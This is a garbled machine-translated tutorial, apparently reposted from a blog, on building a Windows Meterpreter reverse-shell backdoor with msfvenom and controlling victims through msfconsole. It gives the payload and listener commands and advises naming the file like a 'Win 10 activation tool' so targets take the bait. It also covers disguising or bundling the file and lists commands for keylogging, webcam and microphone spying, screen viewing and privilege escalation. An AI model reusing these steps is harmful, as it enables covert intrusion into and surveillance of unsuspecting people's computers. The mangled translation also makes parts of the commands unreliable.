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This is a metasploit independent load generator and a substitute for MSF load and MSF coding. It's software used to generate backdoors.
MSFvenom is a combination of Msfpayload and Msfencode, and both tools are placed in a framework instance. From June 8, 20 15, msfvenom replaced msfpayload and msfencode.
Demonstration environment
Use Kali 202 1.3 for demonstration operation.
Target UAV: Win 10 Professional Edition
Software: msfvenom, MSF console (built in Kali system)
1. Enter administrator mode.
Commander: Sudo Su
Explanation: If you don't run in administrator mode, you may be prompted that you have insufficient permissions. To avoid command execution failure, please run the following command under the administrator.
Command: msfvenom-p windows/meterpreter/reverse _ tcplhost = local IP >; LPORT= local port number >–f exe–o file name >. Extensions of executable programs
Description: Local ip writes the IP address of its own Kali, and you can use ifconfig to check the IP address of its own Kali.
The local port can set an unoccupied port number at will. If the port number is occupied, the file generation will fail, just change the port number.
You can write your favorite name in the file name, such as Win 10 activation tool, which may make it easier for the target host to take the bait.
Of course, MSF can also be used to penetrate mobile phones, Macs, Linux and so on.
Next, run the command to generate the file.
The files generated by default are located in the root directory.
Put the file just generated into the target UAV Win 10 system.
Command: msfconsole
(1) command: use exploit/multi/handler (select module).
(2) command: set payload windows/meterpreter/reverse _ TCP (select attack module).
(3) Command: set lhost192.168.32.1(fill in the IP address of your own host).
(4) Command: set lport111(fill in the port number when the file was generated just now).
(5) Command: Display options (view setting parameters)
(6) command: exploit -z -j (background execution)
We can also disguise this program here, change its icon, or bind some software and automatically install it on the other computer when the user opens it.
(1) Command: Session (View Hooked Users)
(2) Command: sessions -i 1 (select the user to attack, here select 1.
Command: run vnc -i
Cmd instruction:
Cat reads the contents of the file to the screen.
Cd change directory
Checksum retrieves the checksum of the file.
Cp copies the source to the destination.
Delete the specified file
Directory list file (alias for ls)
Download download file or directory
Edit edit file
Print the local working directory.
Getwd print working directory
Lcd changes local working directory
Lls lists local files.
Lpwd prints the local working directory.
Ls list file
Mkdir create directory
The mv moves the source to the target.
Print working directory
Rm deletes the specified file.
Rmdir delete directory
Search search file
Show_mount lists all mount points/logical drives.
Upload upload file or directory.
Pkill terminates the process by name.
Keyscan_start starts capturing keystrokes (starts keyboard recording).
Keyscan_dump dump key buffer (download keyboard record)
Keyscan_stop stops capturing keystrokes (stops keyboard recording).
Record_mic is x seconds away from the default microphone record_mic.
Webcam_chat starts a video chat (video, the other party will have a pop-up window).
Webcam _ List Individual Cameras (View Camera List)
Webcam_snap takes a snapshot from the specified camera (the camera takes photos).
Webcam_stream plays the video stream of the specified camera (camera monitoring is turned on).
Enumdesktops lists all accessible desktops and windows (form list).
Get the current Meterpreter desktop.
Restart Restart the remote computer.
Shutdown shuts down the remote computer.
Shell to the system command shell.
Enumdesktops lists all accessible desktops and windows.
Get the current meterpreter desktop.
Idletime returns the number of seconds that the remote user is idle.
Keyboard _ Send Send keystroke
Send a key event.
Keyscan_dump dumps the keystroke buffer.
Keyscan_start starts capturing keystrokes.
Keyscan_stop stops capturing keystrokes.
The mouse sends a mouse event.
Screen Sharing View Remote User Desktop in Real Time
Screenshot Capture a screenshot of the interactive desktop.
Setdesktop changes the current desktop of Meterpreters.
Uictl controls some user interface modules.
Record_mic records the audio from the default microphone for x seconds.
Webcam _ Chat Start Video Chat
List the webcams.
Take a snapshot from the designated webcam.
The webcam stream plays the video stream of the specified webcam.
Play plays a waveform audio file (. Wav) file.
Getsystem attempts to elevate your privileges to those of the local system.
Execute -f Notepad to open Notepad.
Original link:/rfz _ 322/article/details/123367668